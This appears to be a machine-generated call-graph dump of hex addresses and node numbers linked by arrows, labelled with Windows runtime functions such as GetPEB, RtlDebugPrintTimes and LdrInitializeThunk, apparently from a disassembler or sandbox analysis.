359826ac GetPEB 21426->21427 21428 35929305 21426->21428 21430 359826bf 21427->21430 21429 35929313 21428->21429 21428->21430 21434 3592973a 21429->21434 21432 359826c8 GetPEB 21430->21432 21433 3592932e 21430->21433 21432->21433 21435 35929762 21434->21435 21439 3592982b 21434->21439 21437 359828dd GetPEB 21435->21437 21438 35929817 21435->21438 21435->21439 21436 35929819 GetPEB 21436->21439 21437->21438 21438->21436 21439->21433 20766 3599d0c0 20767 3599d0e3 20766->20767 20771 3599d0d9 20766->20771 20768 3599d0fc GetPEB 20767->20768 20767->20771 20769 3599d112 20768->20769 20770 3599d179 GetPEB 20769->20770 20769->20771 20770->20771 20117 359f95c3 20118 359f960e 20117->20118 20119 359f9982 20118->20119 20121 359f7120 20118->20121 20122 359f7136 20121->20122 20123 359f7156 GetPEB 20122->20123 20124 359f7166 20122->20124 20123->20124 20124->20119 19979 35962df0 LdrInitializeThunk 20130 3596f1f0 20133 3596f04e 20130->20133 20132 3596f20b 20135 3596f06b 20133->20135 20136 3596f084 20133->20136 20134 3596f0d8 __aulldvrm 20134->20135 20135->20134 20135->20136 20136->20132 21440 359676f0 21443 3596770c 21440->21443 21442 35967707 21444 3596772d RtlDebugPrintTimes 21443->21444 21445 3596771b 21443->21445 21446 3596775a 21444->21446 21445->21442 21446->21442 20137 359a51f0 20138 359a5210 20137->20138 20139 359a5222 20137->20139 20141 359a5228 _vswprintf_s 20138->20141 20142 359a524b 20141->20142 20142->20139 21447 359cb2f0 21448 359cb3ec 21447->21448 21449 359cb30a 21447->21449 21449->21448 21450 359cb3b2 GetPEB 21449->21450 21451 359cb3c8 21450->21451 21451->21448 21452 359cb3d6 GetPEB 21451->21452 21452->21448 21457 359192ff 21458 35919314 RtlDebugPrintTimes 21457->21458 21459 3591932d 21457->21459 21458->21459 21464 35919353 21459->21464 21462 3591933b GetPEB 21463 3591934f 21462->21463 21465 35919335 21464->21465 21470 3591935c 21464->21470 21465->21462 21465->21463 21466 35919375 21466->21465 21467 3597bbaa GetPEB 21466->21467 21468 3597bbbd 21467->21468 21469 359193a6 GetPEB 21469->21470 21470->21466 21470->21469 21471 359d12ed 21472 359d169e 21471->21472 21485 359d1313 21471->21485 21473 359d16ad GetPEB 21472->21473 21474 359d18b4 21472->21474 21477 359d16bd GetPEB 21473->21477 21489 359d16d7 21473->21489 21476 359d18bd GetPEB 21474->21476 21474->21489 21475 359d1824 GetPEB 21478 359d1830 GetPEB 21475->21478 21475->21489 21479 359d18c9 GetPEB 21476->21479 21476->21489 21477->21489 21478->21489 21479->21489 21480 359d17e0 GetPEB 21481 359d17ec GetPEB 21480->21481 21480->21489 21481->21489 21482 359d16dd GetPEB 21484 359d16e9 GetPEB 21482->21484 21482->21489 21483 359d1774 21486 359d177f GetPEB 21483->21486 21483->21489 21484->21489 21485->21472 21485->21475 21485->21480 21485->21482 21485->21483 21487 3591f626 10 API calls 21485->21487 21485->21489 21490 359d172d GetPEB 21485->21490 21491 3591f172 31 API calls 21485->21491 21488 359d178b GetPEB 21486->21488 21486->21489 21487->21485 21488->21489 21490->21489 21492 359d1739 GetPEB 21490->21492 21491->21485 21492->21489 21145 359b97ea 21146 359b98a7 GetPEB 21145->21146 21148 359b992a 21146->21148 21152 359b9920 21146->21152 21151 359b9a71 21148->21151 21148->21152 21153 359495da 21148->21153 21150 35949274 GetPEB 21150->21152 21151->21150 21151->21152 21154 3594960d 21153->21154 21156 3594963b 21153->21156 21155 35949618 GetPEB 21154->21155 21154->21156 21155->21156 21156->21151 21157 3592d7e0 21159 3592d829 21157->21159 21158 3592d8ec 21159->21158 21160 3592daf0 GetPEB 21159->21160 21160->21158 21160->21159 21493 3594d6e0 21494 3594d70d 21493->21494 21496 3598f1bc 21493->21496 21495 3594d735 GetPEB 21494->21495 21498 3594d743 21495->21498 21497 3598f279 GetPEB 21496->21497 21500 3594d795 21497->21500 21498->21497 21499 3594d755 21498->21499 21501 3594d7b0 2 API calls 21499->21501 21501->21500 21502 359b36ee 21503 359b3734 21502->21503 21504 359b373d GetPEB 21503->21504 21505 359b374d 21503->21505 21504->21505 21507 359b3762 GetPEB 21505->21507 21516 359b3772 21505->21516 21506 359b39ee 21507->21516 21508 359b37cc GetPEB 21511 359b37db 21508->21511 21510 359b37f8 21511->21510 21513 359b37e9 GetPEB 21511->21513 21512 359b38fe 21512->21506 21514 359b37b9 21512->21514 21519 359b35ba 21512->21519 21513->21510 21514->21508 21514->21510 21514->21511 21515 359b38ea GetPEB 21515->21512 21516->21506 21516->21512 21516->21514 21516->21515 21517 359b38d6 GetPEB 21516->21517 21518 35933ca0 21517->21518 21518->21515 21520 359b360b 21519->21520 21521 359b3614 GetPEB 21520->21521 21522 359b3624 21520->21522 21521->21522 21523 359b3649 21522->21523 21524 359b3639 GetPEB 21522->21524 21525 359b36a2 GetPEB 21523->21525 21526 359b36ce 21523->21526 21527 359b36b1 21523->21527 21524->21523 21525->21527 21526->21514 21527->21526 21528 359b36bf GetPEB 21527->21528 21528->21526 20779 359e70e9 20782 359e7115 20779->20782 20781 359e7250 20795 359e7357 20781->20795 20782->20781 20783 359e7279 20782->20783 20785 359e72a5 20782->20785 20787 359e7571 20782->20787 20786 359e7357 RtlDebugPrintTimes 20785->20786 20786->20783 20789 359e759b 20787->20789 20788 359e7633 RtlDebugPrintTimes 20792 359e7656 20788->20792 20789->20788 20790 359e765d 20790->20782 20791 359e768c RtlDebugPrintTimes 20793 359e76a8 20791->20793 20792->20790 20792->20791 20793->20790 20794 359e76e1 RtlDebugPrintTimes 20793->20794 20794->20790 20796 359e73b3 20795->20796 20798 359e73ff 20796->20798 20799 359e744b 20796->20799 20798->20783 20800 359e748b 20799->20800 20801 359e7490 RtlDebugPrintTimes 20800->20801 20802 359e74bf 20800->20802 20801->20802 20802->20798 20143 3596b5ec 20144 3596b5fe 20143->20144 20145 3596b830 20144->20145 20146 3596b6ad __aulldvrm 20144->20146 20147 3596b6d7 20146->20147 20148 359451ef 20149 35945227 20148->20149 20150 3598bb9e 20148->20150 20149->20150 20151 35945244 20149->20151 20152 3598bbb6 GetPEB 20150->20152 20175 35945523 20150->20175 20153 3594525d GetPEB 20151->20153 20155 35945275 20151->20155 20152->20175 20153->20155 20154 3598bccf GetPEB 20157 35945535 20154->20157 20158 359452a6 GetPEB 20155->20158 20159 3594534c 20155->20159 20155->20175 20156 35945540 20157->20156 20160 3598bcee GetPEB 20157->20160 20168 359452b7 20158->20168 20161 3594537d GetPEB 20159->20161 20169 35945425 20159->20169 20159->20175 20160->20156 20173 3594538e 20161->20173 20162 35945456 GetPEB 20176 35945467 20162->20176 20163 3594532f 20163->20159 20165 3594533c GetPEB 20163->20165 20164 3594531d GetPEB 20164->20163 20165->20159 20166 359453f6 GetPEB 20167 35945408 20166->20167 20167->20169 20170 35945415 GetPEB 20167->20170 20168->20163 20168->20164 20168->20175 20169->20162 20169->20175 20170->20169 20171 3598bcaf GetPEB 20171->20175 20172 3594550a 20174 35945513 GetPEB 20172->20174 20172->20175 20173->20166 20173->20167 20173->20175 20174->20175 20175->20154 20175->20157 20176->20171 20176->20172 20176->20175 20177 359251ed 20178 359251f9 20177->20178 20179 3592521e GetPEB 20178->20179 20182 35925267 20178->20182 20180 35925231 20179->20180 20179->20182 20180->20182 20183 3595d1d0 20180->20183 20184 3595d1e1 20183->20184 20185 3595d223 20183->20185 20184->20185 20186 3595d1e7 GetPEB 20184->20186 20185->20182 20186->20185 20187 3595d1f6 20186->20187 20188 3595d215 20187->20188 20189 35998baf GetPEB 20187->20189 20188->20185 20191 359f52e2 20188->20191 20189->20188 20192 359f5308 20191->20192 20193 359f530c GetPEB 20192->20193 20194 359f531c 20192->20194 20193->20194 20194->20185 21165 359a5319 21168 35962df0 LdrInitializeThunk 21165->21168 21167 359a5340 21168->21167 21529 359a321f 21530 359a3255 21529->21530 21532 359a3326 21530->21532 21533 35931070 21530->21533 21534 35977eb0 21533->21534 21535 3593107f GetPEB 21534->21535 21536 3598564c 21535->21536 21541 359310ec 21535->21541 21537 35985664 RtlDebugPrintTimes 21536->21537 21536->21541 21537->21541 21538 3593112a 21543 3598585c GetPEB 21538->21543 21547 3593113e 21538->21547 21539 35985774 21540 359857a4 21539->21540 21546 359857e4 21539->21546 21542 359857b0 RtlDebugPrintTimes 21540->21542 21544 3593187b 21540->21544 21541->21538 21541->21539 21541->21544 21542->21544 21545 35985867 GetPEB 21543->21545 21543->21547 21544->21532 21545->21547 21576 359e903e 21546->21576 21547->21544 21550 359311b3 GetPEB 21547->21550 21554 359311c3 21547->21554 21549 35985822 21549->21544 21588 359191da 21549->21588 21550->21554 21552 35985838 21552->21544 21592 359e92a6 21552->21592 21556 35931215 21554->21556 21602 35962df0 LdrInitializeThunk 21554->21602 21556->21544 21557 35985a76 GetPEB 21556->21557 21561 35931480 GetPEB 21556->21561 21563 3593145a 21556->21563 21558 35985a8a GetPEB 21557->21558 21559 35985a9d 21558->21559 21560 35931468 21558->21560 21562 359df453 GetPEB 21559->21562 21560->21561 21572 35931499 21561->21572 21562->21560 21563->21558 21563->21560 21564 35985b5f GetPEB 21565 35985b72 GetPEB 21564->21565 21566 35985b85 21565->21566 21567 3593184b 21565->21567 21566->21567 21568 35985b8e GetPEB 21566->21568 21569 35985bc5 GetPEB 21567->21569 21570 35931863 21567->21570 21568->21567 21569->21570 21573 3593186e 21570->21573 21574 35985be1 GetPEB 21570->21574 21571 35985c12 GetPEB 21571->21544 21572->21544 21572->21564 21575 35931840 21572->21575 21573->21544 21573->21571 21574->21573 21575->21565 21575->21567 21577 359e906a 21576->21577 21578 359e9071 21576->21578 21577->21549 21578->21577 21579 359e91ee GetPEB 21578->21579 21581 359e91fe 21578->21581 21586 359e91da 21578->21586 21579->21581 21580 359e92a6 4 API calls 21580->21577 21582 359e9236 21581->21582 21583 359e9226 GetPEB 21581->21583 21582->21577 21584 359e923d GetPEB 21582->21584 21583->21582 21584->21577 21585 359e924c 21584->21585 21585->21586 21587 359e9255 GetPEB 21585->21587 21586->21577 21586->21580 21587->21586 21589 359191ef 21588->21589 21590 35919219 21588->21590 21589->21590 21591 35919240 2 API calls 21589->21591 21590->21552 21591->21590 21593 359e92d6 21592->21593 21594 359e9414 GetPEB 21593->21594 21595 359e9424 21593->21595 21594->21595 21596 359e944a GetPEB 21595->21596 21597 359e9457 21595->21597 21596->21597 21598 359e945e GetPEB 21597->21598 21599 359e9481 21597->21599 21598->21599 21600 359e946d 21598->21600 21599->21544 21600->21599 21601 359e9476 GetPEB 21600->21601 21601->21599 21602->21556 20803 359a7410 20804 35977e54 20803->20804 20805 359a741c GetPEB 20804->20805 20808 359a743c 20805->20808 20806 359a7442 20807 359c7370 12 API calls 20807->20806 20808->20806 20808->20807 20809 359ab010 20810 359ab043 20809->20810 20812 359ab05b 20810->20812 20813 35962df0 LdrInitializeThunk 20810->20813 20813->20812 21603 35951607 21604 3595164f 21603->21604 21608 35951623 21603->21608 21610 359516cf 21604->21610 21606 35951662 21607 35991a3b 21609 35991a66 GetPEB 21607->21609 21608->21604 21608->21606 21608->21607 21608->21609 21609->21606 21611 35977e54 21610->21611 21612 359516db GetPEB 21611->21612 21613 35951700 21612->21613 21613->21606 21614 35955600 21616 3595560b 21614->21616 21617 3595563f 21616->21617 21618 359556d5 21616->21618 21619 359556e2 21618->21619 21621 359556fe 21619->21621 21622 35955734 GetPEB 21619->21622 21621->21616 21623 35955761 21622->21623 21623->21619 20195 359cf104 20198 359c7370 20195->20198 20197 359cf136 20199 359c737c 20198->20199 20201 359c7397 20199->20201 20202 359c9010 20199->20202 20201->20197 20203 359c9038 20202->20203 20209 359c902e 20202->20209 20204 359c9041 20203->20204 20210 359c915d 20203->20210 20205 359c90a0 20204->20205 20207 359c90ad 20204->20207 20212 359c93f6 20205->20212 20216 359c94e0 20207->20216 20209->20201 20210->20209 20211 359c9353 RtlDebugPrintTimes 20210->20211 20211->20210 20214 359c9419 20212->20214 20213 359c9422 20213->20209 20214->20213 20215 359c946a RtlDebugPrintTimes 20214->20215 20215->20213 20217 359c952b 20216->20217 20218 359c9540 20217->20218 20219 359c9589 20217->20219 20223 359c9695 20217->20223 20220 359c9566 20218->20220 20221 359c9593 GetPEB 20218->20221 20219->20209 20234 359e972b GetPEB 20220->20234 20226 359c9573 20221->20226 20223->20219 20224 359c971c RtlDebugPrintTimes 20223->20224 20229 359c972f 20224->20229 20225 359c967d RtlDebugPrintTimes 20225->20219 20226->20225 20227 359c97cf RtlDebugPrintTimes 20227->20229 20228 359c99d9 RtlDebugPrintTimes 20228->20229 20229->20219 20229->20227 20229->20228 20230 359c9cf1 RtlDebugPrintTimes 20229->20230 20231 359c9b50 RtlDebugPrintTimes 20229->20231 20232 359c98a5 RtlDebugPrintTimes 20229->20232 20233 359c9a5d RtlDebugPrintTimes 20229->20233 20230->20229 20231->20229 20232->20229 20233->20229 20234->20226 21169 35917330 21170 35917344 21169->21170 21172 35917383 21169->21172 21171 3591735f GetPEB 21170->21171 21170->21172 21171->21172 21173 359a933b 21174 359a934f 21173->21174 21175 359a9354 21173->21175 21179 359a92bc 21174->21179 21177 359a9379 21175->21177 21184 359a930b GetPEB 21175->21184 21180 359a92e7 21179->21180 21181 359a92c5 GetPEB GetPEB 21179->21181 21182 359a9308 21180->21182 21183 359a92ee GetPEB GetPEB 21180->21183 21181->21182 21182->21175 21183->21182 21185 359a9320 GetPEB GetPEB 21184->21185 21186 359a9317 21184->21186 21187 359a9338 21185->21187 21186->21185 21186->21187 21187->21177 20235 35921131 20238 35921183 20235->20238 20236 35921215 RtlDebugPrintTimes 20237 3592123d 20236->20237 20239 3597f590 GetPEB 20238->20239 20240 3597f57e GetPEB 20238->20240 20242 35921202 20238->20242 20239->20242 20241 35933ca0 20240->20241 20241->20239 20242->20236 20242->20237 20243 3595d530 20244 35998d4f 20243->20244 20247 3595d54b 20243->20247 20245 3595d5fe 20246 35998d3e GetPEB 20245->20246 20249 3595d606 20245->20249 20246->20244 20247->20244 20247->20245 20248 3595d5ed GetPEB 20247->20248 20248->20245 21624 35957630 21625 35957653 21624->21625 21627 35957684 21624->21627 21626 35994680 RtlDebugPrintTimes BaseQueryModuleData 21625->21626 21625->21627 21626->21627 20250 3592d534 GetPEB 20251 35983ef0 20250->20251 20253 3592d55d 20250->20253 20252 35983ef9 GetPEB 20251->20252 20251->20253 20252->20253 20254 35983f15 GetPEB 20253->20254 20256 3592d570 20253->20256 20254->20256 20255 3592d5e2 GetPEB 20257 35983fc8 20255->20257 20259 3592d5f3 20255->20259 20256->20255 20261 3592d601 20256->20261 20258 35983fd1 GetPEB 20257->20258 20257->20259 20258->20259 20260 35983fed GetPEB 20259->20260 20259->20261 20260->20261 20262 35967530 20263 35967551 _strnlen 20262->20263 20264 3596753d 20262->20264 20263->20264 20814 359c3430 20815 359c3456 20814->20815 20816 359c3460 20814->20816 20816->20815 20817 359c3523 20816->20817 20818 359c3545 20816->20818 20817->20815 20819 3594340d GetPEB 20817->20819 20821 3594340d 20818->20821 20819->20815 20822 35943411 20821->20822 20824 35943428 20821->20824 20823 35943417 GetPEB 20822->20823 20822->20824 20823->20824 20824->20815 20825 359e3430 20826 359e3447 20825->20826 20827 359e3463 20825->20827 20827->20826 20829 359e3492 20827->20829 20830 359e34cb 20829->20830 20832 359e34c3 20829->20832 20830->20826 20832->20830 20833 359e5643 RtlDebugPrintTimes 20832->20833 20834 359e565e 20833->20834 20834->20832 20275 3591b120 20278 3591b136 20275->20278 20277 3591b132 20280 3591b149 20278->20280 20279 3597cdf3 20282 3597ce0d GetPEB 20279->20282 20287 3591b20b 20279->20287 20280->20279 20281 3591b17b GetPEB 20280->20281 20283 3591b184 20280->20283 20280->20287 20281->20283 20282->20287 20284 3591b19b GetPEB 20283->20284 20283->20287 20285 3591b1af 20284->20285 20285->20279 20286 3591b1ba 20285->20286 20286->20287 20288 3591b1f8 GetPEB 20286->20288 20287->20277 20288->20287 20289 359db52f 20291 359db562 20289->20291 20292 359db559 20289->20292 20290 359db793 GetPEB 20290->20292 20294 359db588 20291->20294 20295 35945020 20291->20295 20294->20290 20294->20292 20296 35945037 20295->20296 20298 3594505d 20295->20298 20296->20298 20299 359450e4 20296->20299 20298->20294 20300 3594510f 20299->20300 20301 35945154 20299->20301 20300->20301 20302 35945171 GetPEB 20300->20302 20301->20298 20304 35945187 20302->20304 20303 3594519f GetPEB 20303->20301 20304->20301 20304->20303 21188 35923720 21189 35923742 21188->21189 21190 3592379f GetPEB 21189->21190 21191 359237b1 21190->21191 21196 359e132d 21197 359e134d 21196->21197 21201 359e1346 21196->21201 21198 359e151b 21197->21198 21199 359e150b GetPEB 21197->21199 21200 359e1525 GetPEB 21198->21200 21198->21201 21199->21198 21200->21201 20305 35929126 20306 35929135 20305->20306 20307 3598253e RtlDebugPrintTimes 20306->20307 20309 359291dd 20306->20309 20310 35982561 20307->20310 20308 3598265e RtlDebugPrintTimes ReleaseActCtx 20308->20309 20310->20308 20310->20309 21202 3595f320 21205 3595f3a9 21202->21205 21203 3598d8ef 21204 3595f5a7 21206 3595f5e4 21204->21206 21212 3595f603 GetPEB 21204->21212 21205->21203 21205->21204 21209 3595f6b6 21205->21209 21218 3595f71f 21209->21218 21211 3595f6f3 21211->21204 21213 3595f62c 21212->21213 21217 3595f677 21212->21217 21214 35921090 RtlDebugPrintTimes 21213->21214 21215 3595f63d 21214->21215 21216 3598d910 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 21215->21216 21215->21217 21216->21217 21217->21206 21219 3595f7d2 21218->21219 21222 3595f749 21218->21222 21220 3598db17 GetPEB 21219->21220 21224 3595f7e8 21219->21224 21221 3598db28 21220->21221 21222->21219 21223 3598da7e GetPEB 21222->21223 21223->21219 21224->21211 21632 359fb627 21634 359fb63d 21632->21634 21633 359fb715 21634->21633 21635 359fb704 RtlDebugPrintTimes 21634->21635 21635->21633 20835 3596d42a 20839 3596d456 20835->20839 20838 3596d453 20840 3596d43f __indefinite 20839->20840 20840->20838 20841 35943429 20842 35943458 20841->20842 20844 359434c0 20842->20844 20845 35943587 20842->20845 20846 359435c0 20845->20846 20847 359435f8 20845->20847 20846->20847 20849 35957505 20846->20849 20847->20842 20850 35957520 20849->20850 20851 3599462e 20849->20851 20850->20851 20852 35957533 GetPEB 20850->20852 20853 3595754e 20852->20853 20854 35945020 2 API calls 20853->20854 20857 35957564 20853->20857 20854->20857 20855 359575b4 GetPEB 20856 359575c8 20855->20856 20856->20847 20857->20855 21225 3594f32a 21228 3594f353 21225->21228 21229 3594f343 21225->21229 21226 3594f3b6 21227 3594f36b GetPEB 21227->21229 21228->21226 21228->21227 20858 359c705e 20859 359e633e 20858->20859 20860 359c7073 GetPEB 20859->20860 20862 359c7086 20860->20862 20861 359c70c0 RtlDebugPrintTimes 20863 359c70ca 20861->20863 20862->20861 20862->20863 20864 359c7108 GetPEB 20863->20864 20865 359c711f 20864->20865 20868 359e15e3 20865->20868 20867 359c71ed 20869 359e15fc 20868->20869 20872 35962df0 LdrInitializeThunk 20869->20872 20871 359e161a 20871->20867 20872->20871 21640 35925650 21641 35925669 21640->21641 21642 359256c3 21641->21642 21643 359807d3 RtlDebugPrintTimes 21641->21643 21646 35925702 21642->21646 21643->21642 21645 359256cf 21647 359257a5 21646->21647 21648 3592571c 21646->21648 21651 35927152 7 API calls 21647->21651 21649 359807e8 21648->21649 21650 35925727 21648->21650 21653 35980823 21649->21653 21654 359807f4 21649->21654 21652 359270e7 2 API calls 21650->21652 21655 35925730 21651->21655 21652->21655 21656 35980832 GetPEB 21653->21656 21660 3598080e RtlDebugPrintTimes 21654->21660 21668 35925796 21654->21668 21655->21656 21657 35925742 21655->21657 21655->21668 21659 35980845 21656->21659 21658 3592574e 21657->21658 21657->21659 21662 3592575f RtlDebugPrintTimes 21658->21662 21661 359f50d9 GetPEB 21659->21661 21660->21668 21664 35925780 21661->21664 21662->21664 21663 35980861 GetPEB 21665 3592578d 21663->21665 21664->21663 21664->21665 21666 359f5152 GetPEB 21665->21666 21665->21668 21667 3598088c 21666->21667 21667->21667 21668->21645 20311 359b355e 20316 3592b6c0 20311->20316 20313 359b3579 20314 359b358f 20313->20314 20315 3592b6c0 8 API calls 20313->20315 20315->20314 20317 35977eb0 20316->20317 20318 3592b6cc GetPEB 20317->20318 20319 35983834 20318->20319 20321 3592b744 20318->20321 20320 3598383c GetPEB 20319->20320 20319->20321 20320->20321 20322 3598385d GetPEB 20321->20322 20327 3592b752 20321->20327 20322->20327 20323 3592b779 GetPEB 20325 359838e4 20323->20325 20328 3592b791 20323->20328 20326 359838f5 GetPEB 20325->20326 20325->20328 20326->20328 20327->20323 20327->20325 20330 3592b79f 20327->20330 20332 35929486 20327->20332 20328->20330 20331 35983911 GetPEB 20328->20331 20330->20313 20331->20330 20334 35929492 20332->20334 20333 35929535 20333->20323 20334->20333 20335 35929524 20334->20335 20336 35929699 GetPEB 20334->20336 20335->20333 20337 359827b2 GetPEB 20335->20337 20336->20333 20337->20333 20338 35957150 20339 35957208 2 API calls 20338->20339 20340 35957164 20339->20340 20341 35994514 RtlDebugPrintTimes 20340->20341 20342 359571a1 20340->20342 20341->20342 20873 3594b052 GetPEB 20874 3594b0c1 20873->20874 20875 3594b073 20873->20875 20875->20874 20877 3594b0cf 20875->20877 20878 3594b0f7 20877->20878 20879 3594b16c 20878->20879 20880 3594b280 7 API calls 20878->20880 20879->20874 20880->20878 20343 3599d550 20344 35953274 2 API calls 20343->20344 20345 3599d560 20344->20345 20881 3599f450 20882 3599f46a 20881->20882 20883 3599f485 20882->20883 20886 3599f540 20882->20886 20885 3599f51c 20888 3599f54c 20886->20888 20887 3599f71a 20887->20885 20888->20887 20889 3599f6fb RtlDebugPrintTimes 20888->20889 20889->20888 20346 359cb550 20348 359cb564 20346->20348 20347 359cb639 GetPEB 20349 359cb64e 20347->20349 20348->20347 20348->20349 20352 359cb597 20348->20352 20350 359cb679 GetPEB 20349->20350 20349->20352 20351 359cb693 20350->20351 20351->20352 20353 359cb6a3 GetPEB 20351->20353 20353->20352 20890 359cb450 20891 359cb47f 20890->20891 20892 359cb468 20890->20892 20894 359cb47d 20891->20894 20896 359cb48c GetPEB 20891->20896 20897 359cb4a5 GetPEB 20891->20897 20893 359cb46c GetPEB 20892->20893 20892->20894 20893->20894 20895 359cb4bc GetPEB 20894->20895 20898 359cb4cd 20894->20898 20895->20898 20896->20891 20897->20894 20899 3592b440 20900 35977e54 20899->20900 20901 3592b44f GetPEB 20900->20901 20902 35983733 20901->20902 20904 3592b48f 20901->20904 20903 3598373c GetPEB 20902->20903 20902->20904 20903->20904 20905 3598375d GetPEB 20904->20905 20909 3592b49d 20904->20909 20905->20909 20906 359837b6 20908 359837ee GetPEB 20906->20908 20910 3592b604 20906->20910 20907 3592b5e9 GetPEB 20907->20906 20907->20910 20908->20910 20909->20906 20909->20907 20911 3592b60d 20909->20911 20910->20911 20912 3598380b GetPEB 20910->20912 20912->20911 21234 35933740 21236 35933783 21234->21236 21235 359337f0 21236->21235 21237 359337cb GetPEB 21236->21237 21238 359337e2 21237->21238 21239 359869ee 21237->21239 21238->21235 21241 35986a0a GetPEB 21238->21241 21239->21238 21240 359869f7 GetPEB 21239->21240 21240->21238 21241->21235 20354 359b3140 20357 359b3173 20354->20357 20356 359b317c 20357->20356 20359 359b3202 GetPEB 20357->20359 20360 359b31f1 GetPEB 20357->20360 20361 359b3235 20357->20361 20362 35962df0 LdrInitializeThunk 20357->20362 20358 359b32f6 GetPEB 20358->20356 20359->20357 20360->20357 20361->20356 20361->20358 20362->20357 21246 3591d34c 21250 3591d393 21246->21250 21263 3591d54b 21246->21263 21247 3591d5c0 21248 3591d5db GetPEB 21247->21248 21255 3591d5ed 21247->21255 21248->21255 21253 3591d407 21250->21253 21250->21255 21250->21263 21268 35917270 21250->21268 21251 3591d41a 21254 3591d796 4 API calls 21251->21254 21253->21251 21256 359db1e1 2 API calls 21253->21256 21253->21263 21257 3591d429 21254->21257 21256->21251 21257->21247 21257->21255 21258 3591d6aa 2 API calls 21257->21258 21257->21263 21259 3591d4e9 21258->21259 21259->21255 21260 3591d510 GetPEB 21259->21260 21259->21263 21261 3591d524 21260->21261 21261->21255 21262 3591d6aa 2 API calls 21261->21262 21262->21263 21263->21247 21264 35943342 21263->21264 21265 3594335a 21264->21265 21274 359433a5 21265->21274 21267 3594336c 21267->21247 21270 3591729a 21268->21270 21273 359172fb 21268->21273 21269 359db256 4 API calls 21271 35979f9c 21269->21271 21270->21269 21270->21273 21272 35943342 GetPEB 21271->21272 21271->21273 21272->21273 21273->21253 21275 359433be 21274->21275 21276 359433f2 GetPEB 21275->21276 21277 35943403 21275->21277 21276->21277 21277->21267 21282 35927370 21283 359275de 21282->21283 21292 359273b1 21282->21292 21284 35927627 21285 359818a3 GetPEB 21284->21285 21286 359818b6 21285->21286 21312 359f547f 21286->21312 21288 359274df 21289 35927562 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 21288->21289 21294 359274e6 21288->21294 21291 359275ab 21289->21291 21290 359818c2 GetPEB 21293 359275d0 21290->21293 21291->21290 21291->21293 21292->21284 21292->21285 21292->21286 21292->21288 21293->21283 21316 359f55c9 21293->21316 21296 35927516 21294->21296 21303 35927703 21294->21303 21298 359818eb GetPEB 21296->21298 21299 35927523 21296->21299 21298->21299 21302 35927531 21299->21302 21320 359f54db 21299->21320 21301 35981905 21301->21301 21304 3592771d 21303->21304 21305 3598190a GetPEB 21304->21305 21306 35927725 21304->21306 21305->21306 21311 35927733 21306->21311 21324 359f53fc 21306->21324 21308 35981970 RtlDebugPrintTimes 21309 35981980 21308->21309 21309->21309 21310 35927877 21310->21294 21311->21308 21311->21310 21313 359f54a2 21312->21313 21314 359f54a6 GetPEB 21313->21314 21315 359f54b6 21313->21315 21314->21315 21315->21291 21317 359f55fb 21316->21317 21318 359f55ff GetPEB 21317->21318 21319 359f560f 21317->21319 21318->21319 21319->21296 21321 359f54fe 21320->21321 21322 359f5502 GetPEB 21321->21322 21323 359f5512 21321->21323 21322->21323 21323->21301 21325 359f5446 21324->21325 21326 359f544a GetPEB 21325->21326 21327 359f545a 21325->21327 21326->21327 21327->21311 21328 3593d770 21330 3593d7b1 21328->21330 21329 3593d922 21330->21329 21331 35989475 RtlDebugPrintTimes 21330->21331 21331->21329 20913 3594d070 20916 3594d090 GetPEB 20913->20916 20915 3594d082 20917 3598eec3 20916->20917 20918 3594d0af 20916->20918 20918->20917 20919 3594d0b8 GetPEB 20918->20919 20920 3594d0e1 20919->20920 20920->20915 20367 3595b570 20368 3595b5a6 20367->20368 20370 3595b5bc 20368->20370 20377 3593f720 20368->20377 20371 359973e2 GetPEB 20370->20371 20373 3595b609 20370->20373 20374 359973f0 20371->20374 20372 35997443 GetPEB 20372->20373 20374->20372 20385 3594d7b0 20374->20385 20376 3599743b 20376->20372 20378 35977e54 20377->20378 20379 3593f72c GetPEB 20378->20379 20382 3593f74c 20379->20382 20380 3593f8d7 20381 35989e69 GetPEB 20380->20381 20384 3593f8e4 20380->20384 20381->20384 20382->20380 20383 3593f925 GetPEB 20382->20383 20383->20380 20384->20370 20386 3594d7bc 20385->20386 20387 3594d93d RtlDebugPrintTimes 20386->20387 20389 3594d8e0 20386->20389 20390 3594d818 20386->20390 20387->20390 20388 3594d8cd GetPEB 20388->20389 20389->20376 20390->20388 20391 3596f170 20393 3596f17d 20391->20393 20392 3596f04e __aulldvrm 20394 3596f1a1 20392->20394 20393->20392 21336 359c3370 21337 359c3387 21336->21337 21338 359c33a2 21336->21338 21339 3594340d GetPEB 21338->21339 21340 359c33b4 21339->21340 21341 3594340d GetPEB 21340->21341 21342 359c33c6 21341->21342 21343 359c33d8 GetPEB 21342->21343 21343->21337 21673 35919660 21674 3591967c 21673->21674 21676 359196b1 21674->21676 21677 359196db 21674->21677 21678 359196ed 21677->21678 21680 35919714 21678->21680 21681 35919730 21678->21681 21680->21676 21682 35919745 21681->21682 21683 35919759 GetPEB 21682->21683 21686 3591976a 21682->21686 21683->21686 21684 3597bca6 GetPEB 21685 359197e4 21684->21685 21685->21678 21686->21684 21686->21685 20925 35921460 20933 3592147e 20925->20933 20935 359214e0 20925->20935 20926 3591f626 10 API calls 20926->20933 20927 3592176b 20929 3591f172 31 API calls 20927->20929 20928 35921586 GetPEB 20930 35921702 GetPEB 20928->20930 20928->20933 20929->20935 20930->20933 20931 35921605 GetPEB 20931->20933 20932 359217bd GetPEB 20932->20933 20933->20926 20933->20927 20933->20928 20933->20931 20933->20932 20934 35921732 GetPEB 20933->20934 20933->20935 20934->20933 20398 359fb16b 20399 359fb190 20398->20399 20400 359fb314 RtlDebugPrintTimes 20399->20400 20401 359fb2ef 20399->20401 20405 359fb331 20400->20405 20402 359fb412 20402->20401 20403 359fb5fc RtlDebugPrintTimes 20402->20403 20403->20401 20404 359fb474 RtlDebugPrintTimes 20407 359fb487 20404->20407 20405->20401 20405->20402 20405->20404 20406 359fb587 RtlDebugPrintTimes 20406->20402 20407->20402 20407->20406 20936 359a106e GetPEB 20937 359a10aa 20936->20937 20938 359a1099 20936->20938 20940 35921090 20938->20940 20941 359210a8 20940->20941 20942 359210d5 RtlDebugPrintTimes 20941->20942 20943 359210ba 20941->20943 20942->20943 20943->20937 21687 35959660 21688 3595966f 21687->21688 21689 35995faa GetPEB 21688->21689 21690 35959677 21688->21690 21689->21690 21691 359596ba 21690->21691 21696 3591b765 21690->21696 21693 359596e7 GetPEB 21691->21693 21695 35995ffc 21691->21695 21694 359596f8 21693->21694 21697 3591b771 21696->21697 21698 3591b7a3 GetPEB 21697->21698 21699 35933ca0 21698->21699 21700 3591b7bf GetPEB 21699->21700 21701 35933ca0 21700->21701 